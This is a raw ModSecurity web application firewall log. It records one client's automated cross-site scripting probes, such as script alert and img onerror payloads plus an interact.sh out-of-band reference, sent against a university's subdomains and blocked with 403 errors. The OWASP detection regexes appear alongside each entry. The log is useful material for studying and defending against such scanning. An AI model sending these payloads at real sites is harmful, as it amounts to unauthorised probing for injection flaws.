[Tue Aug 29 11:56:02.627757 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAArB1uoAAAAV"]
[Tue Aug 29 11:56:02.647324 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAArC7dYAAAAW"]
[Tue Aug 29 11:56:02.649272 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6O0AAAAr"]
[Tue Aug 29 11:56:02.654796 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqeFgwAAAAx"]
[Tue Aug 29 11:56:02.696122 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAq5@K4AAAAK"]
[Tue Aug 29 11:56:02.697318 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqSw48AAAAN"]
[Tue Aug 29 11:56:02.699528 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqeFg4AAAAx"]
[Tue Aug 29 11:56:02.718180 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqSw5AAAAAN"]
[Tue Aug 29 11:56:02.790770 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqY6PQAAAAr"]
[Tue Aug 29 11:56:02.803876 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YsCo-f0AAAqeFhIAAAAx"]
[Tue Aug 29 11:56:03.541730 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAApa-RsAAAAg"]
[Tue Aug 29 11:56:03.559831 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16Y8Co-f0AAAqeFhQAAAAx"]
[Tue Aug 29 11:56:03.561403 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAq@sd4AAAAM"]
[Tue Aug 29 11:56:03.566621 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArB1u4AAAAV"]
[Tue Aug 29 11:56:03.568219 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16Y8Co-f0AAApa-RwAAAAg"]
[Tue Aug 29 11:56:03.608741 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAApbUt0AAAAh"]
[Tue Aug 29 11:56:03.618652 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16Y8Co-f0AAArB1u8AAAAV"]
[Tue Aug 29 11:56:03.629359 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAqeFhYAAAAx"]
[Tue Aug 29 11:56:03.630221 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArC7eEAAAAW"]
[Tue Aug 29 11:56:03.676887 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAq5@LYAAAAK"]
[Tue Aug 29 11:56:03.731450 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArC7eIAAAAW"]
[Tue Aug 29 11:56:03.733731 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArB1vEAAAAV"]
[Tue Aug 29 11:56:03.756641 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArB1vIAAAAV"]
[Tue Aug 29 11:56:04.538419 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seAAAAAM"]
[Tue Aug 29 11:56:04.560731 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqY6PgAAAAr"]
[Tue Aug 29 11:56:04.562806 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAArB1vUAAAAV"]
[Tue Aug 29 11:56:04.595558 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqSw5kAAAAN"]
[Tue Aug 29 11:56:04.597145 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqeFh0AAAAx"]
[Tue Aug 29 11:56:04.617073 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqeFh4AAAAx"]
